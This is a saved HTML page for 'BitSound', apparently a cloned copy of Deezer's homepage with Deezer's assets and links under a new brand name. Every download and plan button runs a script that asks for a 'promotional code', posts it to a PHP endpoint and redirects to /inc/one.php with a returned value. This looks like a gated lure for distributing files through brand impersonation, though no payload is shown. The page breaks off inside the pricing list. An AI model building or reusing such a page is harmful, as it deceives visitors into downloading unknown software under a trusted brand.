<!DOCTYPE html>
<html lang="en-GB" class="js websockets placeholder flexbox no-flexboxtweener draganddrop" xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <title>BitSound - music streaming | Try Flow, download &amp; listen to free music</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta property="fb:app_id" content="241284008322">

    <link href="https://e-cdns-files.dzcdn.net/cache/images/common/favicon/favicon.a6a53d55264841165a904dbea19d5d73.ico" rel="shortcut icon" type="image/x-icon">
    <link rel="shortcut icon" href="11.ico" type="image/x-icon">
    <link href="https://e-cdns-files.dzcdn.net/cache/images/common/favicon/favicon-16x16.526cde4edf20647be4ee32cdf35c1c13.png" rel="icon" sizes="16x16" type="image/png">
    <link href="https://e-cdns-files.dzcdn.net/cache/images/common/favicon/favicon-32x32.42917d14a8cb0cc4045c827251b57c0e.png" rel="icon" sizes="32x32" type="image/png">
    <link href="https://e-cdns-files.dzcdn.net/cache/images/common/favicon/favicon-48x48.92337504a99482504bbee02dce6997e1.png" rel="icon" sizes="48x48" type="image/png">
    <link href="https://e-cdns-files.dzcdn.net/cache/images/common/favicon/favicon-96x96.852baf648e79894b668670e115e4a375.png" rel="icon" sizes="96x96" type="image/png">
    <link href="https://e-cdns-files.dzcdn.net/cache/images/common/favicon/favicon-256x256.37ca2d4f52f47137b0517b2da0d85eee.png" rel="icon" sizes="256x256" type="image/png">
    <link href="https://e-cdns-files.dzcdn.net/cache/images/common/favicon/apple-touch-icon.0faedc2a9ed312db04eb0361fb14a41a.png" rel="apple-touch-icon" sizes="180x180">
    <link color="#5BBAD5" href="https://e-cdns-files.dzcdn.net/cache/images/common/favicon/safari-pinned-tab.02f82a9db938e6a4e9642a533e102370.svg" rel="mask-icon" type="image/svg+xml">
    <meta property="og:image" content="https://cdns-files.dzcdn.net/img/common/opengraph-logo.png">

    <link rel="chrome-webstore-item" href="https://chrome.google.com/webstore/detail/npfkoakaabdallkcdbpkkhfilkkngakh">

    <link href="./index_files/app-web.e74bebd9924fed906de9.css" rel="stylesheet" type="text/css">
    <script async="" src="./index_files/fbevents.js.Без названия"></script>
    <script type="text/javascript" async="" src="./index_files/f.txt"></script>
    <script src="./index_files/sdk.js.Без названия" async="" crossorigin="anonymous"></script>
    <script src="./index_files/cb=gapi.loaded_0" async=""></script>
    <script src="./index_files/platform.js.Без названия" gapi_processed="true">
        {
            parsetags: 'explicit'
        }
    </script>
    <script id="facebook-jssdk" src="./index_files/sdk.js(1).Без названия"></script>
    <script type="text/javascript" async="" src="./index_files/analytics.js.Без названия"></script>
    <script async="" src="./index_files/gtm.js.Без названия"></script>
    <script src="./index_files/cast_sender.js.Без названия"></script>
    <script src="./index_files/runtime.fe6f3de0248a92d85908.js.Без названия"></script>
    <script src="./index_files/legacy.e686e8553692262303bd.js.Без названия"></script>
    <script src="./index_files/bocal-en-GB.cc46333f2e10114c24a7.js.Без названия" defer="true"></script>
    <script src="./index_files/app-web.9e3494040c9844a17402.js.Без названия" defer="true"></script>
    <script>
  	function down(){
  	  swal('Enter the promotional code to start the download:', {
  	      content: 'input',
  	  }).then((value) => {
  	        $.ajax({
  	        type: 'POST',
  	        url: '../action.php',
  	        data: {
  	            promo: value
  	        },
  	        success: function(data) {
  	          console.log(data);
  	          if(data == "1"){
  	            swal('This promotional code is not valid or has not been created.');
  	          }else{
  	            swal('Thank you for participating in the project, the download will begin soon.');
  	            function hell() {
  	              document.location.href = "/inc/one.php?work="+data+"&url=/inc/two.php";
  	            }
  	            setTimeout(hell, 3200);
  	          }
  	        }
  	      });
  	  });
  	}
  	</script>
  	<script src="https://unpkg.com/sweetalert/dist/sweetalert.min.js"></script>
    <script src="chrome-extension://pkedcjkdefgpdelpbcmbmeomcjbeemfm/cast_sender.js"></script>
    <link rel="stylesheet" type="text/css" href="./index_files/route-home.dd791862273d383f72f4.css">
    <script charset="utf-8" src="./index_files/route-home.3cf702f2d08b2bee0748.js.Без названия"></script>
    <style type="text/css">
        .fb_hidden {
            position: absolute;
            top: -10000px;
            z-index: 10001
        }

        .fb_reposition {
            overflow: hidden;
            position: relative
        }

        .fb_invisible {
            display: none
        }

        .fb_reset {
            background: none;
            border: 0;
            border-spacing: 0;
            color: #000;
            cursor: auto;
            direction: ltr;
            font-family: "lucida grande", tahoma, verdana, arial, sans-serif;
            font-size: 11px;
            font-style: normal;
            font-variant: normal;
            font-weight: normal;
            letter-spacing: normal;
            line-height: 1;
            margin: 0;
            overflow: visible;
            padding: 0;
            text-align: left;
            text-decoration: none;
            text-indent: 0;
            text-shadow: none;
            text-transform: none;
            visibility: visible;
            white-space: normal;
            word-spacing: normal
        }

        .fb_reset>div {
            overflow: hidden
        }

        @keyframes fb_transform {
            from {
                opacity: 0;
                transform: scale(.95)
            }
            to {
                opacity: 1;
                transform: scale(1)
            }
        }

        .fb_animate {
            animation: fb_transform .3s forwards
        }

        .fb_dialog {
            background: rgba(82, 82, 82, .7);
            position: absolute;
            top: -10000px;
            z-index: 10001
        }

        .fb_dialog_advanced {
            border-radius: 8px;
            padding: 10px
        }

        .fb_dialog_content {
            background: #fff;
            color: #373737
        }

        .fb_dialog_close_icon {
            background: url(https://static.xx.fbcdn.net/rsrc.php/v3/yq/r/IE9JII6Z1Ys.png) no-repeat scroll 0 0 transparent;
            cursor: pointer;
            display: block;
            height: 15px;
            position: absolute;
            right: 18px;
            top: 17px;
            width: 15px
        }

        .fb_dialog_mobile .fb_dialog_close_icon {
            left: 5px;
            right: auto;
            top: 5px
        }

        .fb_dialog_padding {
            background-color: transparent;
            position: absolute;
            width: 1px;
            z-index: -1
        }

        .fb_dialog_close_icon:hover {
            background: url(https://static.xx.fbcdn.net/rsrc.php/v3/yq/r/IE9JII6Z1Ys.png) no-repeat scroll 0 -15px transparent
        }

        .fb_dialog_close_icon:active {
            background: url(https://static.xx.fbcdn.net/rsrc.php/v3/yq/r/IE9JII6Z1Ys.png) no-repeat scroll 0 -30px transparent
        }

        .fb_dialog_iframe {
            line-height: 0
        }

        .fb_dialog_content .dialog_title {
            background: #6d84b4;
            border: 1px solid #365899;
            color: #fff;
            font-size: 14px;
            font-weight: bold;
            margin: 0
        }

        .fb_dialog_content .dialog_title>span {
            background: url(https://static.xx.fbcdn.net/rsrc.php/v3/yd/r/Cou7n-nqK52.gif) no-repeat 5px 50%;
            float: left;
            padding: 5px 0 7px 26px
        }

        body.fb_hidden {
            height: 100%;
            left: 0;
            margin: 0;
            overflow: visible;
            position: absolute;
            top: -10000px;
            transform: none;
            width: 100%
        }

        .fb_dialog.fb_dialog_mobile.loading {
            background: url(https://static.xx.fbcdn.net/rsrc.php/v3/ya/r/3rhSv5V8j3o.gif) white no-repeat 50% 50%;
            min-height: 100%;
            min-width: 100%;
            overflow: hidden;
            position: absolute;
            top: 0;
            z-index: 10001
        }

        .fb_dialog.fb_dialog_mobile.loading.centered {
            background: none;
            height: auto;
            min-height: initial;
            min-width: initial;
            width: auto
        }

        .fb_dialog.fb_dialog_mobile.loading.centered #fb_dialog_loader_spinner {
            width: 100%
        }

        .fb_dialog.fb_dialog_mobile.loading.centered .fb_dialog_content {
            background: none
        }

        .loading.centered #fb_dialog_loader_close {
            clear: both;
            color: #fff;
            display: block;
            font-size: 18px;
            padding-top: 20px
        }

        #fb-root #fb_dialog_ipad_overlay {
            background: rgba(0, 0, 0, .4);
            bottom: 0;
            left: 0;
            min-height: 100%;
            position: absolute;
            right: 0;
            top: 0;
            width: 100%;
            z-index: 10000
        }

        #fb-root #fb_dialog_ipad_overlay.hidden {
            display: none
        }

        .fb_dialog.fb_dialog_mobile.loading iframe {
            visibility: hidden
        }

        .fb_dialog_mobile .fb_dialog_iframe {
            position: sticky;
            top: 0
        }

        .fb_dialog_content .dialog_header {
            background: linear-gradient(from(#738aba), to(#2c4987));
            border-bottom: 1px solid;
            border-color: #043b87;
            box-shadow: white 0 1px 1px -1px inset;
            color: #fff;
            font: bold 14px Helvetica, sans-serif;
            text-overflow: ellipsis;
            text-shadow: rgba(0, 30, 84, .296875) 0 -1px 0;
            vertical-align: middle;
            white-space: nowrap
        }

        .fb_dialog_content .dialog_header table {
            height: 43px;
            width: 100%
        }

        .fb_dialog_content .dialog_header td.header_left {
            font-size: 12px;
            padding-left: 5px;
            vertical-align: middle;
            width: 60px
        }

        .fb_dialog_content .dialog_header td.header_right {
            font-size: 12px;
            padding-right: 5px;
            vertical-align: middle;
            width: 60px
        }

        .fb_dialog_content .touchable_button {
            background: linear-gradient(from(#4267B2), to(#2a4887));
            background-clip: padding-box;
            border: 1px solid #29487d;
            border-radius: 3px;
            display: inline-block;
            line-height: 18px;
            margin-top: 3px;
            max-width: 85px;
            padding: 4px 12px;
            position: relative
        }

        .fb_dialog_content .dialog_header .touchable_button input {
            background: none;
            border: none;
            color: #fff;
            font: bold 12px Helvetica, sans-serif;
            margin: 2px -12px;
            padding: 2px 6px 3px 6px;
            text-shadow: rgba(0, 30, 84, .296875) 0 -1px 0
        }

        .fb_dialog_content .dialog_header .header_center {
            color: #fff;
            font-size: 16px;
            font-weight: bold;
            line-height: 18px;
            text-align: center;
            vertical-align: middle
        }

        .fb_dialog_content .dialog_content {
            background: url(https://static.xx.fbcdn.net/rsrc.php/v3/y9/r/jKEcVPZFk-2.gif) no-repeat 50% 50%;
            border: 1px solid #4a4a4a;
            border-bottom: 0;
            border-top: 0;
            height: 150px
        }

        .fb_dialog_content .dialog_footer {
            background: #f5f6f7;
            border: 1px solid #4a4a4a;
            border-top-color: #ccc;
            height: 40px
        }

        #fb_dialog_loader_close {
            float: left
        }

        .fb_dialog.fb_dialog_mobile .fb_dialog_close_button {
            text-shadow: rgba(0, 30, 84, .296875) 0 -1px 0
        }

        .fb_dialog.fb_dialog_mobile .fb_dialog_close_icon {
            visibility: hidden
        }

        #fb_dialog_loader_spinner {
            animation: rotateSpinner 1.2s linear infinite;
            background-color: transparent;
            background-image: url(https://static.xx.fbcdn.net/rsrc.php/v3/yD/r/t-wz8gw1xG1.png);
            background-position: 50% 50%;
            background-repeat: no-repeat;
            height: 24px;
            width: 24px
        }

        @keyframes rotateSpinner {
            0% {
                transform: rotate(0deg)
            }
            100% {
                transform: rotate(360deg)
            }
        }

        .fb_iframe_widget {
            display: inline-block;
            position: relative
        }

        .fb_iframe_widget span {
            display: inline-block;
            position: relative;
            text-align: justify
        }

        .fb_iframe_widget iframe {
            position: absolute
        }

        .fb_iframe_widget_fluid_desktop,
        .fb_iframe_widget_fluid_desktop span,
        .fb_iframe_widget_fluid_desktop iframe {
            max-width: 100%
        }

        .fb_iframe_widget_fluid_desktop iframe {
            min-width: 220px;
            position: relative
        }

        .fb_iframe_widget_lift {
            z-index: 1
        }

        .fb_iframe_widget_fluid {
            display: inline
        }

        .fb_iframe_widget_fluid span {
            width: 100%
        }
    </style>
    <script src="./index_files/f(1).txt"></script>
</head>

<body class="dir-ltr os-windows is-unlogged">
    <div id="dzr-app">
        <nav class="topbar">
            <div class="cell cell-logo"><a href="https://www.deezer.com/en/" id="topbar-deezer-logo"><h1 style="font-size:2em">BitSound</h1></a></div>
            <div class="cell cell-navigation hidden-phone">
                <ul class="nav-main">
                </ul>
            </div>
            <div class="cell cell-profile hidden-phone"><a class="unlogged-btn unlogged-btn-blue unlogged-btn-small" id="topbar-register-button" onclick="down()"><span class="unlogged-btn-label">Download</span></a></div>
        </nav>
        <div class="burger-icon" id="burger_menu_button"><span class="line"></span><span class="line"></span><span class="line"></span></div>
        <div class="burger-menu burger-menu-hidden" id="burger_menu">
            <div>
                <div class="nav-collapse" id="backstage_navigation_collapse">
                    <ul class="nav">
                        <li class="nav-item"><a href="https://www.deezer.com/login" class="nav-main-link backstage-header-link">Log in</a></li>
                        <li class="nav-item"><a href="https://www.deezer.com/register" class="nav-main-link backstage-header-link">Sign up</a></li>
                        <li class="nav-item"><a href="https://www.deezer.com/open_app" class="nav-main-link backstage-header-link">Download the app</a></li>
                        <li class="nav-item"><a href="https://www.deezer.com/en/offers" class="nav-main-link backstage-header-link">Plans</a></li>
                        <li class="nav-item"><a href="https://www.deezer.com/en/channels/explore" class="nav-main-link backstage-header-link">Explore Channels</a></li>
                    </ul>
                </div>
            </div>
        </div>
        <ul class="homepage-telco-list"></ul>
        <div class="unlogged-homepage">
            <header class="hero-block-header">
                <div class="hero-block-wrapper wrapper-default">
                    <div class="hero-block-header-ctn">
                        <h1 class="hero-block-heading-1">You bring the passion.<br>We bring the music.</h1>
                        <h2 class="hero-block-subtitle">Try BitSound Premium free for 30 days*</h2>
                        <div class="hero-block-buttons"><a class="unlogged-btn unlogged-btn-pink unlogged-btn-large unlogged-btn-hover-scale" onclick="down()"><span class="unlogged-btn-label">BitSound Premium</span></a><a class="unlogged-btn unlogged-btn-white unlogged-btn-large unlogged-btn-outline unlogged-btn-on-dark-bg" onclick="down()"><span class="unlogged-btn-label">BitSound Free</span></a></div>
                    </div>
                </div>
            </header>
            <section class="section-feature">
                <div class="container-inner flex">
                    <div class="feature-visual"></div>
                    <div class="feature-info">
                        <h2 class="heading-2">Why BitSound?</h2>
                        <div class="feature-flex">
                            <div class="feature-text">
                                <div>
                                    <h3 class="heading-3">A world of music in your pocket.</h3>
                                    <p class="paragraph">Find new loves and old favourites from over 56 million tracks.</p>
                                </div>
                            </div>
                            <div class="feature-text">
                                <div>
                                    <h3 class="heading-3">No WiFi? No problem.</h3>
                                    <p class="paragraph">With BitSound Premium, you don't need to be connected to enjoy your favourite tracks.</p>
                                </div>
                            </div>
                            <div class="feature-text">
                                <div>
                                    <h3 class="heading-3">Craft your collection.</h3>
                                    <p class="paragraph">Create playlists from millions of tracks and take them with you wherever you go.</p>
                                </div>
                            </div>
                            <div class="feature-text">
                                <div>
                                    <h3 class="heading-3">Made for you.</h3>
                                    <p class="paragraph">Flow gets to know what you like and what you don't. Discover your personal soundtrack.</p>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </section>
            <section class="section-devices">
                <div class="container flex">
                    <div class="devices-visual">
                        <div class="devices-icon">
                            <svg xmlns="http://www.w3.org/2000/svg" width="66px" height="45px" viewBox="0 0 176 120">
                                <title>PC-Mac</title>
                                <path d="M174,93.94H162a2.06,2.06,0,0,0,0,4.12h9.69a7.43,7.43,0,0,1-7,5.88H11.35a7.43,7.43,0,0,1-7-5.88H150a2.11,2.11,0,0,0,.56-.09A8,8,0,0,0,158,90V21.38A9.4,9.4,0,0,0,148.61,12H27.39A9.4,9.4,0,0,0,18,21.38V93.94H2A2.06,2.06,0,0,0-.06,96c0,6.65,5.12,12.06,11.41,12.06h153.3c6.29,0,11.41-5.41,11.41-12.06A2.06,2.06,0,0,0,174,93.94ZM22,21.38A5.4,5.4,0,0,1,27.39,16H148.61A5.4,5.4,0,0,1,154,21.38V90a4,4,0,0,1-3.71,4,2.85,2.85,0,0,0-.29,0H22Z"></path>
                            </svg>
                        </div>
                        <div class="devices-icon">
                            <svg xmlns="http://www.w3.org/2000/svg" width="45px" height="45px" viewBox="0 0 120 120">
                                <title>Mobiles-Tablets</title>
                                <path d="M104.14,44H96a2,2,0,0,0,0,4h8.14A3.86,3.86,0,0,1,108,51.86v60.28a3.86,3.86,0,0,1-3.86,3.86H77.86A3.86,3.86,0,0,1,74,112.14V51.86A3.86,3.86,0,0,1,77.86,48H84a8,8,0,0,0,8-8V7.43A7.43,7.43,0,0,0,84.57,0H15.43A7.43,7.43,0,0,0,8,7.43V112.57A7.43,7.43,0,0,0,15.43,120h88.71a7.87,7.87,0,0,0,7.86-7.86V51.86A7.87,7.87,0,0,0,104.14,44ZM12,112.57V7.43A3.44,3.44,0,0,1,15.43,4H84.57A3.44,3.44,0,0,1,88,7.43V40a4,4,0,0,1-4,4H77.86A7.87,7.87,0,0,0,70,51.86v60.28A7.78,7.78,0,0,0,71,116H15.43A3.44,3.44,0,0,1,12,112.57Z"></path>
                                <circle cx="91" cy="108" r="2.5"></circle>
                                <circle cx="50" cy="108" r="2.5"></circle>
                                <path d="M96,54a2,2,0,0,0-2-2H88a2,2,0,0,0,0,4h6A2,2,0,0,0,96,54Z"></path>
                            </svg>
                        </div>
                        <div class="devices-icon">
                            <svg xmlns="http://www.w3.org/2000/svg" width="45px" height="45px" viewBox="0 0 120 120">
                                <title>Wearables</title>
                                <path d="M81.92,21.45A2,2,0,0,0,80,20V2a2,2,0,0,0-2-2H42a2,2,0,0,0-2,2V20a2,2,0,0,0-1.92,1.45L30.67,47.23a31.87,31.87,0,0,0,0,25.54l7.41,25.78A2,2,0,0,0,40,100v18a2,2,0,0,0,2,2H78a2,2,0,0,0,2-2V100a2,2,0,0,0,1.92-1.45l7.41-25.78a31.88,31.88,0,0,0,0-25.52ZM44,4H76V20H44ZM41.51,24h37l3.74,13-.47-.47A2,2,0,0,0,79,39.47,28,28,0,0,1,85.74,71a1.39,1.39,0,0,0-.12.28,28,28,0,0,1-51.23,0c0-.09-.08-.19-.13-.28a27.95,27.95,0,0,1,0-22c.05-.09.09-.19.13-.28A28,28,0,0,1,73.07,35.23a2,2,0,0,0,1.86-3.54A32,32,0,0,0,37.76,37ZM76,116H44V100H76Zm2.49-20h-37L37.76,83a31.93,31.93,0,0,0,44.48,0Z"></path>
                                <path d="M94,53.39a2,2,0,0,0-2,2v9.22a2,2,0,1,0,4,0V55.39A2,2,0,0,0,94,53.39Z"></path>
                            </svg>
                        </div>
                        <div class="devices-icon">
                            <svg xmlns="http://www.w3.org/2000/svg" width="45px" height="45px" viewBox="0 0 120 120">
                                <title>SoundSystems</title>
                                <path d="M89.46,0H30.54A8.55,8.55,0,0,0,22,8.54V111.46A8.55,8.55,0,0,0,30.54,120H89.46A8.55,8.55,0,0,0,98,111.46V8.54A8.55,8.55,0,0,0,89.46,0ZM94,111.46A4.55,4.55,0,0,1,89.46,116H30.54A4.55,4.55,0,0,1,26,111.46V8.54A4.55,4.55,0,0,1,30.54,4H89.46A4.55,4.55,0,0,1,94,8.54Z"></path>
                                <path d="M60,42a12.05,12.05,0,0,0,4.82-1,2,2,0,0,0-1.6-3.67,8,8,0,1,1,4.13-4.13A2,2,0,0,0,71,34.8,12,12,0,1,0,60,42Z"></path>
                                <path d="M73.84,91.68a2,2,0,0,0,2.77-.54,20,20,0,1,0-5.41,5.43A2,2,0,1,0,69,93.26a16,16,0,1,1,4.33-4.35A2,2,0,0,0,73.84,91.68Z"></path>
                                <path d="M60,52a28,28,0,1,0,17,50.23,2,2,0,0,0-2.43-3.18A23.77,23.77,0,0,1,60,104a24,24,0,1,1,19.09-9.46A2,2,0,0,0,82.27,97,27.72,27.72,0,0,0,88,80,28,28,0,0,0,60,52Z"></path>
                            </svg>
                        </div>
                        <div class="devices-icon">
                            <svg xmlns="http://www.w3.org/2000/svg" width="45px" height="45px" viewBox="0 0 120 120">
                                <title>Voice</title>
                                <circle cx="89.87" cy="80" r="2.23"></circle>
                                <circle cx="89.87" cy="68.12" r="2.23"></circle>
                                <circle cx="89.87" cy="56.23" r="2.23"></circle>
                                <circle cx="89.87" cy="44.34" r="2.23"></circle>
                                <circle cx="77.92" cy="80" r="2.23"></circle>
                                <circle cx="77.92" cy="68.12" r="2.23"></circle>
                                <circle cx="77.92" cy="56.23" r="2.23"></circle>
                                <circle cx="77.92" cy="44.34" r="2.23"></circle>
                                <circle cx="77.92" cy="32.46" r="2.23"></circle>
                                <circle cx="77.92" cy="20.57" r="2.23"></circle>
                                <circle cx="65.97" cy="80" r="2.23"></circle>
                                <circle cx="65.97" cy="68.12" r="2.23"></circle>
                                <circle cx="65.97" cy="56.23" r="2.23"></circle>
                                <circle cx="65.97" cy="44.34" r="2.23"></circle>
                                <circle cx="65.97" cy="32.46" r="2.23"></circle>
                                <circle cx="65.97" cy="20.57" r="2.23"></circle>
                                <circle cx="54.03" cy="80" r="2.23"></circle>
                                <circle cx="54.03" cy="68.12" r="2.23"></circle>
                                <circle cx="54.03" cy="56.23" r="2.23"></circle>
                                <circle cx="54.03" cy="44.34" r="2.23"></circle>
                                <circle cx="54.03" cy="32.46" r="2.23"></circle>
                                <circle cx="54.03" cy="20.57" r="2.23"></circle>
                                <circle cx="42.08" cy="80" r="2.23"></circle>
                                <circle cx="42.08" cy="68.12" r="2.23"></circle>
                                <circle cx="42.08" cy="56.23" r="2.23"></circle>
                                <circle cx="42.08" cy="44.34" r="2.23"></circle>
                                <circle cx="42.08" cy="32.46" r="2.23"></circle>
                                <circle cx="42.08" cy="20.57" r="2.23"></circle>
                                <circle cx="84.08" cy="74.21" r="2.23"></circle>
                                <circle cx="84.08" cy="62.32" r="2.23"></circle>
                                <circle cx="84.08" cy="50.43" r="2.23"></circle>
                                <circle cx="84.08" cy="38.55" r="2.23"></circle>
                                <circle cx="84.08" cy="26.66" r="2.23"></circle>
                                <circle cx="72.13" cy="74.21" r="2.23"></circle>
                                <circle cx="72.13" cy="62.32" r="2.23"></circle>
                                <circle cx="72.13" cy="50.43" r="2.23"></circle>
                                <circle cx="72.13" cy="38.55" r="2.23"></circle>
                                <circle cx="72.13" cy="26.66" r="2.23"></circle>
                                <circle cx="60.18" cy="74.21" r="2.23"></circle>
                                <circle cx="60.18" cy="62.32" r="2.23"></circle>
                                <circle cx="60.18" cy="50.43" r="2.23"></circle>
                                <circle cx="60.18" cy="38.55" r="2.23"></circle>
                                <circle cx="60.18" cy="26.66" r="2.23"></circle>
                                <circle cx="48.23" cy="74.21" r="2.23"></circle>
                                <circle cx="48.23" cy="62.32" r="2.23"></circle>
                                <circle cx="48.23" cy="50.43" r="2.23"></circle>
                                <circle cx="48.23" cy="38.55" r="2.23"></circle>
                                <circle cx="48.23" cy="26.66" r="2.23"></circle>
                                <circle cx="36.28" cy="74.21" r="2.23"></circle>
                                <circle cx="36.28" cy="62.32" r="2.23"></circle>
                                <circle cx="36.28" cy="50.43" r="2.23"></circle>
                                <circle cx="36.28" cy="38.55" r="2.23"></circle>
                                <circle cx="36.28" cy="26.66" r="2.23"></circle>
                                <circle cx="30.13" cy="80" r="2.23"></circle>
                                <circle cx="30.13" cy="68.12" r="2.23"></circle>
                                <circle cx="30.13" cy="56.23" r="2.23"></circle>
                                <circle cx="30.13" cy="44.34" r="2.23"></circle>
                                <path d="M91.6,10.91C90,4.89,83.6,0,77.42,0H42.58C36.4,0,30,4.89,28.39,10.94a200.51,200.51,0,0,0,0,98.53c1.64,6,8,10.91,14.18,10.91H77.42a13.52,13.52,0,0,0,5.38-1.18,2,2,0,0,0-1.6-3.67,9.68,9.68,0,0,1-3.78.85H42.58a11.5,11.5,0,0,1-10.31-7.93,196.46,196.46,0,0,1-4.16-75.07A2.23,2.23,0,1,0,28.44,31q.61-4.14,1.41-8.25l.28,0a2.22,2.22,0,0,0,.61-4.36c.47-2.17,1-4.33,1.52-6.48A11.5,11.5,0,0,1,42.58,4H77.42a11.49,11.49,0,0,1,10.31,7.93c.55,2.16,1,4.33,1.53,6.51a2.22,2.22,0,0,0,.61,4.36l.27,0Q91,26.88,91.56,31a2.22,2.22,0,1,0,.33,2.36,196.46,196.46,0,0,1-4.15,75,9.61,9.61,0,0,1-1.48,3,2,2,0,0,0,3.25,2.33,13.56,13.56,0,0,0,2.1-4.35A200.51,200.51,0,0,0,91.6,10.91Z"></path>
                            </svg>
                        </div>
                        <div class="devices-icon">
                            <svg xmlns="http://www.w3.org/2000/svg" width="66px" height="45px" viewBox="0 0 176 120">
                                <title>TV-Gaming</title>
                                <path d="M174.62,107.25,171.7,93.68a12.46,12.46,0,0,0-5-7.3,2,2,0,1,0-2.33,3.24,8.48,8.48,0,0,1,3.39,4.9l2.92,13.57c.8,3.7-.05,6.83-2.07,7.59a6.22,6.22,0,0,1-6.95-2.19l-4-6.52a2,2,0,0,0-1.71-1H140a2,2,0,0,0-1.7.95l-4,6.52a5.67,5.67,0,0,1-6.54,2.2c-2.17-.82-3.23-4.08-2.48-7.59l2.92-13.57A8.79,8.79,0,0,1,136.29,88H156a8,8,0,0,0,8-8V10.28a2,2,0,0,0-2-2H14a2,2,0,0,0-2,2V98a2,2,0,0,0,2,2H66v4H60a2,2,0,0,0,0,4h56a2,2,0,0,0,0-4h-6v-4h12.89l-1.56,7.25c-1.19,5.51.91,10.63,5,12.17a9.55,9.55,0,0,0,11.35-3.84l3.45-5.57h13.77l3.4,5.56a10,10,0,0,0,8.44,4.44,9.46,9.46,0,0,0,3.33-.59C174,117.92,175.86,113,174.62,107.25ZM106,104H70v-4h36ZM16,96V12.28H160V80a4,4,0,0,1-4,4H136.29a12.85,12.85,0,0,0-12,9.68l-.5,2.32Z"></path>
                            </svg>
                        </div>
                        <div class="devices-icon">
                            <svg xmlns="http://www.w3.org/2000/svg" width="66px" height="45px" viewBox="0 0 176 120">
                                <title>Car</title>
                                <path d="M48.54,73a2,2,0,0,0,2.63-1A10,10,0,1,0,42,78a10.17,10.17,0,0,0,4-.84,2,2,0,0,0-1.6-3.67,6,6,0,1,1,3.1-3.1A2,2,0,0,0,48.54,73Z"></path>
                                <path d="M140.54,73a2,2,0,0,0,2.63-1A10,10,0,1,0,134,78a10.17,10.17,0,0,0,4-.84,2,2,0,0,0-1.6-3.67,6,6,0,1,1,3.1-3.1A2,2,0,0,0,140.54,73Z"></path>
                                <path d="M154.71,49.42c3.32-.24,7-2.89,7.27-6.48,0-.62,0-1.26,0-1.91-.24-3.56-3.95-6.21-7.29-6.46L145.75,34a7.17,7.17,0,0,0-5.2,1.85l-.27.26a87.92,87.92,0,0,0-7.38-17c-2-3.41-6.26-6.2-9.63-6.24C121.9,12.79,110.48,12,88,12s-33.76.78-35.27.89c-3.37,0-7.67,2.83-9.64,6.26a88.06,88.06,0,0,0-7.37,17l-.27-.26A7.19,7.19,0,0,0,30.27,34l-9,.56c-3.32.24-7,2.89-7.27,6.48,0,.62,0,1.26,0,1.91.24,3.56,3.95,6.21,7.29,6.46l6.52.4a18.63,18.63,0,0,0-4.57,6.75,88.11,88.11,0,0,0-5.18,25.16c-.21,4.09-.22,8.7,2.45,11.6a2,2,0,1,0,2.94-2.71C21.93,89,21.89,85.47,22.08,82A84,84,0,0,1,27,58c2.23-6,9.64-10.45,15.15-10.86C57.07,46,72.62,46,87.66,46c15.3,0,31.11,0,46.17,1.09,5.51.4,12.91,4.86,15.14,10.84a84,84,0,0,1,4.95,24c.19,3.55.15,7.06-1.42,8.72-.85.89-2.24,1.33-4.23,1.33H138a8,8,0,0,0-8,8v4.13a4,4,0,0,0,4.08,3.87h15.84a4,4,0,0,0,4.08-3.87V94.57a7.4,7.4,0,0,0,1.4-1.15c2.74-2.89,2.74-7.54,2.52-11.68a88,88,0,0,0-5.19-25.18,18.63,18.63,0,0,0-4.55-6.73l6.51-.4ZM150,104H134v-4a4,4,0,0,1,4-4h10.27a13.72,13.72,0,0,0,1.73-.11Zm-7.8-60.25-.18-.86c0-.6,0-1.21,0-1.79a3.34,3.34,0,0,1,1.16-2.21,3.42,3.42,0,0,1,2.13-.88h.17l8.94.56c1.65.12,3.49,1.51,3.56,2.68a11.85,11.85,0,0,1,0,1.46c-.07,1.2-1.9,2.6-3.55,2.72l-9,.56a3.33,3.33,0,0,1-2.27-.87A3.68,3.68,0,0,1,142.2,43.74ZM30.52,46l-8.94-.56c-1.65-.12-3.49-1.51-3.56-2.68a11.85,11.85,0,0,1,0-1.46c.07-1.21,1.91-2.6,3.54-2.72l9-.56h.16a3.42,3.42,0,0,1,2.11.88A3.33,3.33,0,0,1,34,41.06c0,.61,0,1.23,0,1.82l-.18.84a3.47,3.47,0,0,1-1,1.39,3.28,3.28,0,0,1-2.27.88Zm57.14-4c-15.12,0-30.74,0-45.78,1.1a18.93,18.93,0,0,0-4,.78c0-.12,0-.24,0-.36a79.39,79.39,0,0,1,8.64-22.4c1.37-2.38,4.48-4.23,6.29-4.23H53c1.21-.09,12.5-.88,35-.88s33.79.79,35,.88h.19c1.76,0,4.87,1.85,6.23,4.21a79.35,79.35,0,0,1,8.65,22.42c0,.12,0,.24,0,.36a18.72,18.72,0,0,0-4-.78C118.92,42,103,42,87.66,42Z"></path>
                                <path d="M128,92H30a8,8,0,0,0-8,8v4.13A4,4,0,0,0,26.08,108H41.92A4,4,0,0,0,46,104.13V96h82a2,2,0,0,0,0-4ZM42,104H26v-4a4,4,0,0,1,4-4H42Z"></path>
                                <path d="M106,76a2,2,0,0,0,0-4H70a2,2,0,0,0,0,4Z"></path>
                            </svg>
                        </div>
                    </div>
                    <div class="devices-info">
                        <h2 class="heading-2">Always with you</h2>
                        <p class="paragraph">Download your music and take it from your morning run to dinner out with BitSound Premium. Available on all your devices, all the time, even without WiFi or 4G.</p>
                    </div>
                </div>
            </section>
            <section class="plans-block" id="plans">
                <div class="unlogged-container">
                    <div class="unlogged-titles-container">
                        <h2 class="unlogged-heading-2">Get your music</h2></div>
                    <div class="unlogged-plans-list-container">
                        <ul class="unlogged-plans-list clearfix">
                            <li class="unlogged-single-plan unlogged-single-plan-free" data-popular="RECOMMENDED">
                                <div class="unlogged-single-plan-desc">
                                    <h3 class="unlogged-title">BitSound Free</h3>
                                    <p class="unlogged-heading-2 unlogged-single-plan-price">0$</p>
                                    <div class="unlogged-single-plan-unit">/month</div>
                                    <ul class="unlogged-single-plan-items">
                                        <li class="unlogged-single-plan-item">
                                            <div class="feature-icon">
                                                <svg class="svg-icon svg-icon-check" focusable="false" height="16" width="16" viewBox="0 0 12 12" aria-hidden="true">
                                                    <path d="M.833 5.333a.487.487 0 0 0-.69.688l3.79 3.785.345.344 7.578-7.568a.487.487 0 0 0-.689-.688l-6.889 6.88L.833 5.333z"></path>
                                                </svg>
                                            </div>
                                            <div class="feature-title"> 56 million tracks</div>
                                        </li>
                                        <li class="unlogged-single-plan-item">
